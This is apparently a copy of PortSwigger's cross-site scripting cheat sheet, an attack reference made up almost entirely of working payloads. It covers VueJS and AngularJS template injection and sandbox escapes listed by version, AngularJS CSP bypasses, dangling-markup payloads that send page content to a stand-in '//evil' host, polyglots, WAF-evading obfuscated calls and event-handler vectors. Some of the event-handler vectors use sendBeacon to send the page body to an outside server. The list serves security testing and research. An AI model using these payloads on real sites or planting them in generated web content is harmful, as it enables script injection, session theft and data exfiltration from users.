<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS reflected
Versions, author, length (characters), vector:
All versions, Mario Heiderich (Cure53), 41:
{{constructor.constructor('alert(1)')()}}
All versions, Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google), 62:
<div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions, Gareth Heyes (PortSwigger), 39:
<x v-html=_c.constructor('alert(1)')()>
All versions, Peter af Geijerstam (Swedish Shellcode Factory), 37:
<x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes, reflected
Versions, author, length (characters), vector:
1.0.1 - 1.1.5, Mario Heiderich (Cure53), 41:
{{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter), Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys), 33:
{{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1, Jan Horn (Google), 122:
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5, Gareth Heyes (PortSwigger), 23:
{{{}.")));alert(1)//";}}
1.2.6 - 1.2.18, Jan Horn (Google), 106:
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23, Mathias Karlsson (Detectify), 124:
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29, Gareth Heyes (PortSwigger), 23:
{{{}.")));alert(1)//";}}
1.2.27 - 1.2.29, 1.3.0 - 1.3.20, Gareth Heyes (PortSwigger), 23:
{{{}.")));alert(1)//";}}
1.3.0, Gábor Molnár (Google), 272:
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )))}}
1.3.3 - 1.3.18, Gareth Heyes (PortSwigger), 128:
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19, Gareth Heyes (PortSwigger), 102:
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20, Gareth Heyes (PortSwigger), 65:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9, Gareth Heyes (PortSwigger), 74:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8, Ian Hickey & Gareth Heyes (PortSwigger), 79:
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11, Jan Horn (Google), 517:
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
>=1.6.0, Mario Heiderich (Cure53), 41:
{{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter), Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys), 33:
{{$on.constructor('alert(1)')()}}
DOM-based AngularJS sandbox escapes (using orderBy or no $eval)
Versions, author, length (characters), vector:
1.0.1 - 1.1.5, Mario Heiderich (Cure53), 37:
constructor.constructor('alert(1)')()
1.2.0 - 1.2.18, Jan Horn (Google), 118:
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23, Mathias Karlsson (Detectify), 119:
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26, Gareth Heyes (PortSwigger), 317:
{}[['__proto__']][['x']]=constructor.getOwnPropertyDescriptor;g={}[['__proto__']][['x']];{}[['__proto__']][['y']]=g(''.sub[['__proto__']],'constructor');{}[['__proto__']][['z']]=constructor.defineProperty;d={}[['__proto__']][['z']];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']][['y']].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20, Gareth Heyes (PortSwigger), 20:
{}.")));alert(1)//";
1.4.0 - 1.4.5, Gareth Heyes (PortSwigger), 75:
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0, Mario Heiderich (Cure53), 37:
constructor.constructor('alert(1)')()
1.4.4 (without strings), Gareth Heyes (PortSwigger), 134:
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Versions, author, length (characters), vector:
All versions (Chrome), Gareth Heyes (PortSwigger), 81:
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter, Gareth Heyes (PortSwigger), 56:
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter, Gareth Heyes (PortSwigger), 91:
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0, Eduardo Vela (Google), 190:
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter, via oncut, Savan Gadhiya (NotSoSecure), 49:
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute:
<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet:
<link rel=stylesheet href="//evil?
Link href icon:
<link rel=icon href="//evil?
Meta refresh:
<meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through the src attribute:
<img src="//evil? <image src="//evil?
Video using the track element:
<video><track default src="//evil?
Video using the source element and src attribute:
<video><source src="//evil?
Audio using the source element and src attribute:
<audio><source src="//evil?
Input src:
<input type=image src="//evil?
Button using formaction:
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction:
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Form using action:
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data:
<object data="//evil?
Iframe src:
<iframe src="//evil?
Embed src:
<embed src="//evil?
Use textarea to consume markup and post it to an external site:
<form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target:
<button form=x>XSS</button><form id=x action=//evil target='
Pass markup data through window.name using base target:
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget:
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data:
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page:
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page:
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page:
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page:
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite the type attribute with image in hidden inputs:
<input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1 | javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2 | javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3 | javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
WAF bypass global objects
Description | Code
XSS into a JavaScript string, string concatenation (window) | window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (self) | self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (this) | this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (top) | top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (parent) | parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (frames) | frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (globalThis) | globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, comment syntax (window) | window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (self) | self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (this) | this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (top) | top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (parent) | parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (frames) | frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (globalThis) | globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, hex escape sequence (window) | window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (self) | self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (this) | this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (top) | top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (parent) | parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (frames) | frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (globalThis) | globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window) | window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self) | self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this) | this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top) | top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent) | parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames) | frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis) | globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence (window) | window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (self) | self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (this) | this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (top) | top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (parent) | parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (frames) | frames['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (globalThis) | globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window) | window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self) | self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this) | this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top) | top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent) | parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames) | frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (globalThis) | globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window) | window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self) | self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this) | this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top) | top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent) | parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames) | frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis) | globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window) | window[(+{}+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!+[]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self) | self[(+{}+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!+[]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this) | this[(+{}+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!+[]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top) | top[(+{}+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!+[]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent) | parent[(+{}+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!+[]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames) | frames[(+{}+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!+[]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis) | globalThis[(+{}+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]((+{}+[])[+!+[]])
Impossible labs
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario where you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag. | N/A | N/A
Script-based injection, but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script-based context and the second in HTML. | N/A | N/A
innerHTML context, but no equals allowed | You have a site that processes the query string and URL-decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it? | 15 | <q/oncut=alert``
Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert``
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q/oncut=eval(name)
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute-based injection with arbitrary JavaScript. | 17 | See link
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A
Injection occurs inside a single quoted string, only the characters a-z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A
Classic vectors (XSS crypt)
Description | Code
Image src with JavaScript protocol | <img src=javascript:alert(1)>
Body background with JavaScript protocol | <body background=javascript:alert(1)>
Iframe data URLs no longer work, as modern browsers use a null origin | <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE | <a href=vbscript:MsgBox+1>XSS</a> <a href=# onclick=vbs:Msgbox+1>XSS</a> <a href=# onclick=VBS:Msgbox+1>XSS</a> <a href=# onclick=vbscript:Msgbox+1>XSS</a> <a href=# onclick=VBSCRIPT:Msgbox+1>XSS</a> <a href=# language=vbs onclick=vbscript:Msgbox+1>XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE | <a href=# onclick="jscript.compact:alert(1);">test</a> <a href=# onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript | <a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript | <iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator | <a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator | <link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup | <form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup | <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2 | <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs | <img src=blah style="-moz-binding:url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">
CSS expressions, <=IE7 | <div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of : | <div style="xss=expression(alert(1))"> <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE | <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions | <script>function window.onload(){alert(1)}</script> <script>function window::onload(){alert(1)}</script> <script>function window.location(){}</script> <body><script>function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}</script></body> <body><script>function document.body.innerHTML(){x='<img src=1 onerror=alert(1)>'}</script></body>
GreyMagic HTML+time exploit (no longer works, even in 5 docmode) | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"></BODY></HTML>
Firefox allows NULLs after & (the NUL byte is not shown) | <a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities (the NUL byte is not shown) | <a href="javascript:&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments (the NUL byte is shown as a space) | <!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG | <svg><xss onload=alert(1)>
Isindex using src attribute | <isindex type=image src="//evil?
Isindex using submit | <isindex type=submit style="width:100%;height:100%;" value=XSS formaction="//evil?
Isindex and formaction | <isindex type=submit formaction=javascript:alert(1)>
Isindex and action | <isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
onbeforeunload | Fires if the URL changes | <body onbeforeunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onbegin | Fires when an SVG animation begins | <svg><animate onbegin=alert(1) attributeName=x dur=1s>
onblur | Fires when an element loses focus | <a onblur=alert(1) tabindex=1 id=x></a><input autofocus>
onbounce | Fires when the marquee bounces | <marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
oncanplay | Fires if the resource can be played | <audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
oncanplaythrough | Fires when enough data has been loaded to play the resource all the way through | <video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
oncuechange | Fires when a subtitle cue changes | <video controls><source src="validvideo.mp4" type="video/mp4"><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
ondeactivate | Fires when the element is deactivated | <xss id=x tabindex=1 ondeactivate=alert(1)></xss><input id=y autofocus>
ondurationchange | Fires when the duration changes | <audio controls ondurationchange=alert(1)><source src="validaudio.mp3" type="audio/mpeg"></audio>
onend | Fires when an SVG animation ends | <svg><animate onend=alert(1) attributeName=x dur=1s>
onended | Fires when the resource has finished playing | <audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onerror | Fires when the resource fails to load or causes an error | <audio src/onerror=alert(1)>
onfinish | Fires when the marquee finishes | <marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
onfocus | Fires when the element has focus | <a id=x tabindex=1 onfocus=alert(1)></a>
onfocusin | Fires when the element has focus | <a id=x tabindex=1 onfocusin=alert(1)></a>
onfocusout | Fires when an element loses focus | <a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>
onhashchange | Fires if the hash changes | <body onhashchange=alert(1)>
onload | Fires when the element is loaded | <body onload=alert(1)>
onloadeddata | Fires when the first frame is loaded | <audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onloadedmetadata | Fires when the metadata is loaded | <audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
onloadend | Fires when the element finishes loading | <image src="validimage.png" onloadend=alert(1)>
onloadstart | Fires when the element begins to load | <image src="validimage.png" onloadstart=alert(1)>
onmessage | Fires when a message event is received from a postMessage call | <body onmessage=alert(1)>
onpageshow | Fires when the page is shown | <body onpageshow=alert(1)>
onplay | Fires when the resource is played | <audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onplaying | Fires when the resource is playing | <audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onpopstate | Fires when the history changes | <body onpopstate=alert(1)>
onprogress | Fires when the video/audio begins downloading | <audio controls onprogress=alert(1)><source src="validaudio.mp3" type="audio/mpeg"></audio>
onreadystatechange | Fires when the ready state changes | <applet onreadystatechange=alert(1)></applet>
onrepeat | Fires when an SVG animation repeats | <svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
onresize | Fires when the window is resized | <body onresize=alert(1)>
onscroll | Fires when the page scrolls | <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
onstart | Fires when the marquee starts | <marquee onstart=alert(1)>XSS</marquee>
ontimeupdate | Fires when the timeline is changed | <audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
ontoggle | Fires when the details tag is expanded | <details ontoggle=alert(1) open>test</details>
ontransitioncancel | Fires when a CSS transition cancels | <style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
ontransitionend | Fires when a CSS transition ends | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>
ontransitionrun | Fires when a CSS transition begins | <style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss>
ontransitionstart | Fires when a CSS transition starts | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
onunhandledrejection | Fires when a promise rejection isn't handled | <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
onunload | Fires when the page is unloaded | <body onunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onwaiting | Fires while waiting for data | <video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onwebkitanimationend | Fires when a CSS animation ends | <style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend=alert(1)></xss>
onwebkitanimationiteration | Fires when a CSS animation repeats | <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration=alert(1)></xss>
onwebkitanimationstart | Fires when a CSS animation starts | <style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart=alert(1)></xss>
